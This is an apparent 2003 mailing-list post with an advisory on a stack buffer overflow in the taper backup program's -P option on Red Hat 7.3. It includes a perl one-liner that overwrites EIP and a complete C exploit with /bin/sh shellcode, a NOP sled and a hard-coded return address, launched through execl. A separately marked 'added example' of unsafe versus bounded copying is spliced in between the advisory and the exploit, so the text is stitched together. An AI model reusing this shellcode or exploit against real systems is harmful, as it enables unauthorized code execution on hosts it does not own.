The taper program in Redhat 7.3 contains a stack overflow. Note that taper is not setuid.
Hi,
There is a stack overflow vulnerability in the taper program of Linux 7.3 (maybe others).
On Linux 7.3 it's not suid by default, but I don't know about other distros/versions. Maybe it's suid on others.
Advisory:
------------------------------------------------------------------------------------------------------------------------------
gEEkz-advisory
NrAziz(c) 2003
nraziz_at_geekz_nl
polygrithm_at_hotmail
http://geekz.nl
--{0x01 Introduction:
Taper is a user friendly archive program especially designed
for backing up to tape drives. It also supports backing up to files
on a hard disk.
--{0x02 Vulnerability:
taper has a vulnerability in its handling of the argument to -P. Passing a large
string overwrites the saved EIP,
e.g. taper `perl -e 'print "A" x 2708'` overwrites the EIP. It may have
other vulnerabilities because of its many uses of strcpy(). Taper is non-suid by
default on Linux 7.3; however, if it is suid on any other distro/version, please
let me know.
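As an added example (not the advisory's or taper's own code), here is the pattern the advisory blames, a command-line option value copied into a fixed stack buffer with strcpy(), beside a bounded version that rejects oversized input instead of overrunning the frame. PATH_BUF, the function names and the /dev/nst0 sample path are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

#define PATH_BUF 128   /* constructed buffer size for the example, not taper's */

/* Vulnerable pattern: strcpy copies until it finds a NUL, so an argv value
 * longer than PATH_BUF - 1 bytes runs past path[] into the saved frame pointer
 * and return address above it. Called below only with a short, safe input. */
static void set_path_unsafe(char *path, const char *arg)
{
    strcpy(path, arg);
}

/* Hardened replacement: bound the scan with memchr, refuse input that leaves
 * no room for the NUL, and report failure instead of truncating silently. */
static int set_path_checked(char *path, size_t cap, const char *arg)
{
    const char *end = memchr(arg, '\0', cap); /* never reads past cap bytes */
    if (end == NULL)
        return -1;                            /* >= cap bytes before the NUL */
    memcpy(path, arg, (size_t)(end - arg) + 1);
    return 0;
}

/* Feed a constructed option value of len 'A' bytes (the advisory's test
 * pattern) through the checked copy; returns 0 if accepted, -1 if rejected. */
static int try_option_of_length(size_t len)
{
    static char arg[4096];
    char path[PATH_BUF];
    if (len >= sizeof arg)
        return -2;
    memset(arg, 'A', len);
    arg[len] = '\0';
    return set_path_checked(path, sizeof path, arg);
}

int main(void)
{
    char path[PATH_BUF];
    set_path_unsafe(path, "/dev/nst0");   /* harmless here: fits the buffer */
    if (set_path_checked(path, sizeof path, "/dev/nst0") == 0)
        printf("accepted: %s\n", path);
    if (try_option_of_length(2708) == -1)
        puts("rejected: a 2708-byte -P value does not fit PATH_BUF");
    return 0;
}
```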
--{0x03 Greetz:
To gEEkz team, rave, gorny, and other m8s
------------------------------------------------------------------------------------------------------------------------------
Exploit:
------------------------------------------------------------------------------------------------------------------------------
/* gEEkz-taper-xploit */
/*
 * Copyright(C) 2003 NrAziz
 * nraziz^at^geekz^nl
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* execl */

/* /bin/sh */
char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
"\x80\xb0\x01\x31\xdb\xcd\x80";

#define B_SIZE 2708

int main(int argc,char **argv)
{
    char buffer[B_SIZE+1];           /* +1: the terminating NUL is written at buffer[B_SIZE] */
    unsigned long ret=0xbffff250;    /* hard-coded return address for Red Hat 7.3 */
    (void)argc; (void)argv;

    /* layout: NOP sled, shellcode, then the return address in the last 4 bytes */
    memset(buffer,0x90,B_SIZE-strlen(shellcode)-4);
    buffer[B_SIZE-4]=(char)(ret & 0x000000ff);
    buffer[B_SIZE-3]=(char)((ret & 0x0000ff00)>>8);
    buffer[B_SIZE-2]=(char)((ret & 0x00ff0000)>>16);
    buffer[B_SIZE-1]=(char)((ret & 0xff000000)>>24);
    buffer[B_SIZE]=0;
    memcpy(buffer+B_SIZE-strlen(shellcode)-4,shellcode,strlen(shellcode));
    execl("/usr/sbin/taper","taper","-P",buffer,(char *)0);
    return 0;
}
---------------------------------------------------------------------------------------------------------------------------------------
Regards,
NrAziz